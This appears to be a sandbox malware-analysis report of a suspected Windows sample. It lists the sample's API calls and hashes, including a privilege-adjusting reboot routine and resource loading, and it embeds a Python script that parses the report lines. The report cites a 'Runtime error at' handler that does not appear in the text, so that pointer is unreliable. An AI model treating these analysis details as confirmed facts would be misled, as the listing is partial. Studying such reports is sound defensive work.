                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                                      • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                      • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                                      • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                                      • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                      • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                                      • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                                      • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                                      • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                                      • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID:
                                                                                      • API String ID: 442123175-0
                                                                                      • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                                      • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                                      • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                                      • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                                      APIs
                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatMessage
                                                                                      • String ID:
                                                                                      • API String ID: 1306739567-0
                                                                                      • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                                      • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                                      • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                                      • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNEL32(?,02098000,00409F6B,00000000), ref: 00407613
                                                                                        • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 734332943-0
                                                                                      • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                                      • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                                      • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                                      • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                                      • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                                      • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                                      • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                                      • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                                      • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                                      • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                                      APIs
                                                                                      • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrev
                                                                                      • String ID:
                                                                                      • API String ID: 122130370-0
                                                                                      • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                      • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                                      • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                                      • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                                      • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                                      • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                                      • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                                      • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                                      • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                                      • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                                      • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
• ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
• Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
• Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
• Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
• SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
• Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
• Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
• Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
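The two function entries above (the SeShutdownPrivilege/ExitWindowsEx sequence and the FindResourceA/LoadResource/LockResource sequence) are only as useful as the constants in their argument lists, which the report leaves raw. The following script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's "APIs" lines into records, decodes the ExitWindowsEx flags and the resource type/ID from the Windows SDK values (EWX_REBOOT = 2, RT_RCDATA = 10), and flags a function that both enables SeShutdownPrivilege and calls ExitWindowsEx. The sample input is copied from the lines of this report; the helper names and the flag tables are the example's own.

```python
"""Parse per-function "APIs" lines from a Joe Sandbox report and decode the
constants that matter for triage. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One line of the report's APIs block, with or without an argument list, e.g.
#   • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
#   • ExitProcess.KERNEL32 ref: 00403DE5
#   • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(...), ref: 0040517A
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows SDK values (winuser.h / winuser.h resource types); assumed, not from the report.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
RT_TYPES = {1: "RT_CURSOR", 2: "RT_BITMAP", 3: "RT_ICON", 10: "RT_RCDATA",
            24: "RT_MANIFEST"}

# Constructed input: the API lines of two function entries, copied from the report.
SHUTDOWN_FUNC = """
• GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
• ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
"""
RESOURCE_FUNC = """
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
• SizeofResource.KERNEL32(00000000,00000000,?,00409BC5), ref: 00409AED
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409AFF
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409B10
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall: Optional[int] = None # set when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an APIs block into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def as_int(arg: str) -> Optional[int]:
    """Report arguments are hex (optionally signed); '?' and strings give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_exit_windows_flags(uflags: int) -> List[str]:
    names = [name for bit, name in EWX_FLAGS.items() if uflags & bit]
    return names or ["EWX_LOGOFF"]   # 0 means log off the interactive user only


def reboot_capability(calls: List[ApiCall]) -> Optional[List[str]]:
    """Decoded ExitWindowsEx flags when the function both enables
    SeShutdownPrivilege and calls ExitWindowsEx; None otherwise."""
    has_priv = any(c.api.startswith("LookupPrivilegeValue")
                   and "SeShutdownPrivilege" in c.args for c in calls)
    adjusts = any(c.api == "AdjustTokenPrivileges" for c in calls)
    for c in calls:
        if c.api == "ExitWindowsEx" and has_priv and adjusts and c.args:
            flags = as_int(c.args[0])
            if flags is not None:
                return decode_exit_windows_flags(flags)
    return None


def find_resource_lookup(calls: List[ApiCall]) -> Optional[dict]:
    """Decode FindResourceA(hModule, lpName, lpType) when name and type are integer IDs."""
    for c in calls:
        if c.api.startswith("FindResource") and len(c.args) >= 3:
            res_id, res_type = as_int(c.args[1]), as_int(c.args[2])
            if res_id is not None and res_type is not None:
                return {"id": res_id, "type": RT_TYPES.get(res_type, f"type {res_type}")}
    return None


if __name__ == "__main__":
    print("shutdown function:", reboot_capability(parse_api_lines(SHUTDOWN_FUNC)))
    print("resource function:", find_resource_lookup(parse_api_lines(RESOURCE_FUNC)))
```

Run against the two entries, the first decodes to `['EWX_REBOOT']`, matching the report's "Contains functionality to shutdown / reboot the system" signature, and the second to `RT_RCDATA` ID 11111 (0x2B67), the resource slot Inno Setup's SetupLdr uses for its offset table, which is consistent with the Delphi-style "Runtime error at" handler later in this listing; confirm with the dropped-file list before treating the stub as an installer wrapper.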
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: SystemTime
• String ID: s-CP
• API String ID: 2656138-3630450927
• Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
• Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
• Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
• Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
• Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
APIs
• GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
• Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
• Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
• Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
